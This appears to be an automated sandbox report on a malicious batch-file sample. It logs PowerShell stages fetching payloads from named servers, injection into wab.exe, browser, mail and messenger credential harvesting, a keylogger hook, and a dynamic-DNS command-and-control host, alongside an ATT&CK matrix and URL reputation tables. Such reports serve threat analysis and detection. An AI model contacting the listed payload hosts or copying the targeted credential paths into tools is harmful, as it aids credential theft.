              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_21CB2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,11_2_21CB2264
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,17_2_004082CD
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 16_2_0041739B GetVersionExW,16_2_0041739B
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match | File source: 0000001E.00000002.3417567901.0000000000EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001B.00000002.3098127241.0000000003000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001D.00000002.3408938742.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001B.00000002.3137363083.0000000022D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001D.00000002.3417419300.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001D.00000002.3416540680.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001C.00000002.3417935091.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: wab.exe PID: 7108, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Roaming\jiourhjs.dat, type: DROPPED
              Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
              Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
              Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
              Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
              Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
              Source: C:\Windows\SysWOW64\clip.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: ESMTPPassword 17_2_004033F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 17_2_00402DB3
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 17_2_00402DB3
              Source: Yara match | File source: Process Memory Space: wab.exe PID: 7108, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: wab.exe PID: 6460, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match | File source: 0000001E.00000002.3417567901.0000000000EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001B.00000002.3098127241.0000000003000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001D.00000002.3408938742.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001B.00000002.3137363083.0000000022D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001D.00000002.3417419300.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001D.00000002.3416540680.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001C.00000002.3417935091.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: wab.exe PID: 7108, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Roaming\jiourhjs.dat, type: DROPPED
              ATT&CK matrix (one line per tactic column; the bracketed digits are the signature-count badges the report shows in front of a matched technique):

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
              Resource Development: Scripting [112]; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
              Execution: Windows Management Instrumentation [1]; Native API [11]; Exploitation for Client Execution [1]; Command and Scripting Interpreter [112]; PowerShell [2]; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
              Persistence: Scripting [112]; DLL Side-Loading [1]; Registry Run Keys / Startup Folder [11]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
              Privilege Escalation: Abuse Elevation Control Mechanism [1]; DLL Side-Loading [1]; Access Token Manipulation [1]; Process Injection [412]; Registry Run Keys / Startup Folder [11]; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
              Defense Evasion: Deobfuscate/Decode Files or Information [1]; Abuse Elevation Control Mechanism [1]; Obfuscated Files or Information [2]; Software Packing [1]; DLL Side-Loading [1]; Masquerading [1]; Modify Registry [1]; Virtualization/Sandbox Evasion [51]; Access Token Manipulation [1]; Process Injection [412]; Rundll32 [1]
              Credential Access: OS Credential Dumping [1]; Input Capture [11]; Credentials in Registry [2]; Credentials In Files [1]; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
              Discovery: System Time Discovery [1]; Account Discovery [1]; File and Directory Discovery [3]; System Information Discovery [29]; Query Registry [1]; Security Software Discovery [51]; Virtualization/Sandbox Evasion [51]; Process Discovery [4]; Application Window Discovery [1]; System Owner/User Discovery [1]; System Network Connections Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
              Collection: Archive Collected Data [1]; Data from Local System [1]; Email Collection [1]; Input Capture [11]; Clipboard Data [2]; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
              Command and Control: Ingress Tool Transfer [3]; Encrypted Channel [21]; Non-Standard Port [1]; Non-Application Layer Protocol [4]; Application Layer Protocol [15]; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
              Behavior Graph ID: 1449968 | Sample: MATALJ Kft Rendel#U00e9s H6... | Start date: 31/05/2024 | Architecture: WINDOWS | Score: 100

              Start
                DNS/IP: jgbours284hawara02.duckdns.org (Uses dynamic DNS services); www.led-svitidla.eu; 6 other IPs or domains
                Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 13 other signatures
                Started: cmd.exe; wab.exe; rundll32.exe; wab.exe
              cmd.exe
                Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Very long command line found
                Started: powershell.exe; conhost.exe
              powershell.exe (started by cmd.exe)
                DNS/IP: 194.59.30.6 (ports 49712, 51544, 80; COMBAHTONcombahtonGmbHDE, Germany)
                Signatures: Suspicious powershell command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading
                Started: powershell.exe; conhost.exe; dllhost.exe; cmd.exe
              powershell.exe (second stage)
                Signatures: Suspicious powershell command line found; Very long command line found; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading
                Started: wab.exe; cmd.exe
              wab.exe (started by second-stage powershell.exe)
                DNS/IP: jgbours284hawara02.duckdns.org 178.215.236.110 (ports 3050, 51547, 51548; LVLT-10753US, Germany); geoplugin.net 178.237.33.50 (ports 51550, 80; ATOM86-ASATOM86NL, Netherlands)
                Dropped: C:\Users\user\AppData\Roaming\jiourhjs.dat (data); IMG-46657388578355...tingsmedlemmers.vbs (ASCII)
                Signatures: Maps a DLL or memory area into another process; Installs a global keyboard hook
                Started: wscript.exe; wab.exe (Tries to steal Instant Messenger accounts or passwords; Tries to harvest and steal browser information (history, passwords, etc)); wab.exe (Tries to steal Mail credentials (via file / registry access)); 2 other processes, which started reg.exe (Creates multiple autostart registry keys) and conhost.exe
              wscript.exe
                Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Very long command line found; 2 other signatures
                Started: powershell.exe
              powershell.exe (started by wscript.exe)
                DNS/IP: ramirex.ro 188.215.50.15 (ports 443, 51553, 51555; WEBCLASSITRO, Romania)
                Signatures: Suspicious powershell command line found; Very long command line found
                Started: powershell.exe; conhost.exe; cmd.exe
              powershell.exe (second stage)
                Signatures: Writes to foreign memory regions
                Started: wab.exe; cmd.exe; wab.exe
              wab.exe
                Signatures: Maps a DLL or memory area into another process
                Injected: sofUaEnRVTAexkDmTx.exe
              sofUaEnRVTAexkDmTx.exe
                Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                Started: clip.exe
              clip.exe
                Signatures: Tries to steal Mail credentials (via file / registry access); Creates multiple autostart registry keys; Tries to harvest and steal browser information (history, passwords, etc); 3 other signatures

              Source | Detection | Scanner | Label | Link
              MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.bat | 14% | Virustotal | | Browse
              MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.bat | 13% | ReversingLabs | |
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              led-svitidla.eu | 0% | Virustotal | | Browse
              geoplugin.net | 0% | Virustotal | | Browse
              jgbours284hawara02.duckdns.org | 5% | Virustotal | | Browse
              ramirex.ro | 0% | Virustotal | | Browse
              www.led-svitidla.eu | 0% | Virustotal | | Browse
              103.169.127.40.in-addr.arpa | 1% | Virustotal | | Browse
              171.39.242.20.in-addr.arpa | 1% | Virustotal | | Browse
              Source | Detection | Scanner | Label | Link
              http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
              http://www.imvu.comr | 0% | URL Reputation | safe |
              http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
              http://crl.microsoft | 0% | URL Reputation | safe |
              http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe |
              https://go.micro | 0% | URL Reputation | safe |
              https://contoso.com/License | 0% | URL Reputation | safe |
              http://www.imvu.com | 0% | URL Reputation | safe |
              https://contoso.com/Icon | 0% | URL Reputation | safe |
              http://geoplugin.net/json.gp | 100% | URL Reputation | phishing |
              https://aka.ms/pscore6lB | 0% | URL Reputation | safe |
              https://contoso.com/ | 0% | URL Reputation | safe |
              https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
              https://login.yahoo.com/config/login | 0% | URL Reputation | safe |
              https://aka.ms/pscore68 | 0% | URL Reputation | safe |
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
              http://www.ebuddy.com | 0% | URL Reputation | safe |
              http://194.59.30.6/UWYVFXQWh32.bin | 100% | Avira URL Cloud | malware |
              http://www.387mfyr.sbs/abt9/?URl0T=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtP4lJF/NTbeuWt8c3rTDi+tIT1z/PR+XwsW/JFZfA6LrcKjOeOKI=&_t6=urjP348hAPL0Tj-P | 0% | Avira URL Cloud | safe |
              http://www.imvu.compData | 0% | Avira URL Cloud | safe |
              http://194.59.30.6/Uncomic.mdpXR | 0% | Avira URL Cloud | safe |
              http://194.59.30.6/Uncomic.mdpP | 0% | Avira URL Cloud | safe |
              http://www.nirsoft.net | 0% | Avira URL Cloud | safe |
              https://ramirex.ro/Rutschebanes.qxd | 0% | Avira URL Cloud | safe |
              http://ramirex.ro | 0% | Avira URL Cloud | safe |
              https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe |
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe |
              http://194.59.30.6/UWYVFXQWh32.bin | 0% | Virustotal | | Browse
              http://www.led-svitidla.eu/abt9/ | 0% | Avira URL Cloud | safe |
              http://www.nirsoft.net | 0% | Virustotal | | Browse
              https://www.google.com | 0% | Avira URL Cloud | safe |
              https://ramirex.ro/Rutschebanes.qxd | 0% | Virustotal | | Browse
              https://ramirex.ro/Rutschebanes.qxdXR | 0% | Avira URL Cloud | safe |
              http://194.59.30.6/UWYVFXQWh32.binB | 0% | Avira URL Cloud | safe |
              http://crl.microso | 0% | Avira URL Cloud | safe |
              http://194.59.30.6/UWYVFXQWh32.binHovesValramirex.ro/UWYVFXQWh32.bin | 0% | Avira URL Cloud | safe |
              https://github.com/Pester/Pester | 1% | Virustotal | | Browse
              http://ramirex.ro | 0% | Virustotal | | Browse
              http://194.59.30.6 | 0% | Avira URL Cloud | safe |
              https://www.google.com/accounts/servicelogin | 0% | Avira URL Cloud | safe |
              http://www.microsof. | 0% | Avira URL Cloud | safe |
              http://www.nirsoft.net/ | 0% | Avira URL Cloud | safe |
              https://ramirex.ro/HtwvlcDSFcrAhhcHdD97.bin | 0% | Avira URL Cloud | safe |
              http://194.59.30.6/Uncomic.mdp | 100% | Avira URL Cloud | malware |
              http://194.59.30.6 | 3% | Virustotal | | Browse
              https://ramirex.ro | 0% | Avira URL Cloud | safe |
              https://ramirex.ro/HtwvlcDSFcrAhhcHdD97.bin | 0% | Virustotal | | Browse
              https://www.google.com/accounts/servicelogin | 0% | Virustotal | | Browse
              https://www.google.com | 0% | Virustotal | | Browse
              https://ramirex.ro | 0% | Virustotal | | Browse
              http://www.nirsoft.net/ | 0% | Virustotal | | Browse
              http://194.59.30.6/Uncomic.mdp | 7% | Virustotal | | Browse
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              www.387mfyr.sbs | 137.220.252.40 | true | false | | unknown
              led-svitidla.eu | 37.235.104.9 | true | false | | unknown
              geoplugin.net | 178.237.33.50 | true | false | | unknown
              jgbours284hawara02.duckdns.org | 178.215.236.110 | true | true | | unknown
              ramirex.ro | 188.215.50.15 | true | false | | unknown
              103.169.127.40.in-addr.arpa | unknown | unknown | true | | unknown
              www.led-svitidla.eu | unknown | unknown | true | | unknown
              171.39.242.20.in-addr.arpa | unknown | unknown | true | | unknown
                Name | Malicious | Antivirus Detection | Reputation
                http://194.59.30.6/UWYVFXQWh32.bin | false | 0%, Virustotal, Browse; Avira URL Cloud: malware | unknown
                http://www.387mfyr.sbs/abt9/?URl0T=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtP4lJF/NTbeuWt8c3rTDi+tIT1z/PR+XwsW/JFZfA6LrcKjOeOKI=&_t6=urjP348hAPL0Tj-P | false | Avira URL Cloud: safe | unknown
                https://ramirex.ro/Rutschebanes.qxd | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                http://www.led-svitidla.eu/abt9/ | false | Avira URL Cloud: safe | unknown
                http://geoplugin.net/json.gp | true | URL Reputation: phishing | unknown
                https://ramirex.ro/HtwvlcDSFcrAhhcHdD97.bin | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                http://194.59.30.6/Uncomic.mdp | false | 7%, Virustotal, Browse; Avira URL Cloud: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.2669451040.0000024A52932000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2503901264.000000000593A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2503901264.0000000005A77000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://www.imvu.comr | wab.exe, 0000000B.00000002.3437805432.00000000226E0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.2503089959.0000000004A2D000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://194.59.30.6/Uncomic.mdpP | powershell.exe, 00000003.00000002.2579735465.0000024A42AED000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://crl.microsoft | powershell.exe, 00000014.00000002.3389504984.0000000007630000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.2503089959.0000000004A2D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://www.imvu.compData | wab.exe, 00000012.00000002.2541165592.0000000002BBD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://go.micro | powershell.exe, 00000003.00000002.2579735465.0000024A43B13000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://contoso.com/License | powershell.exe, 00000006.00000002.2503901264.0000000005A77000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://www.imvu.com | wab.exe, wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.2541165592.0000000002BBD000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://contoso.com/Icon | powershell.exe, 00000006.00000002.2503901264.0000000005A77000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://194.59.30.6/Uncomic.mdpXR | powershell.exe, 00000006.00000002.2503089959.0000000004A2D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.nirsoft.net | wab.exe, 00000010.00000002.2560201870.0000000000164000.00000004.00000010.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                http://ramirex.ro | powershell.exe, 00000014.00000002.3321380834.0000000004F63000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
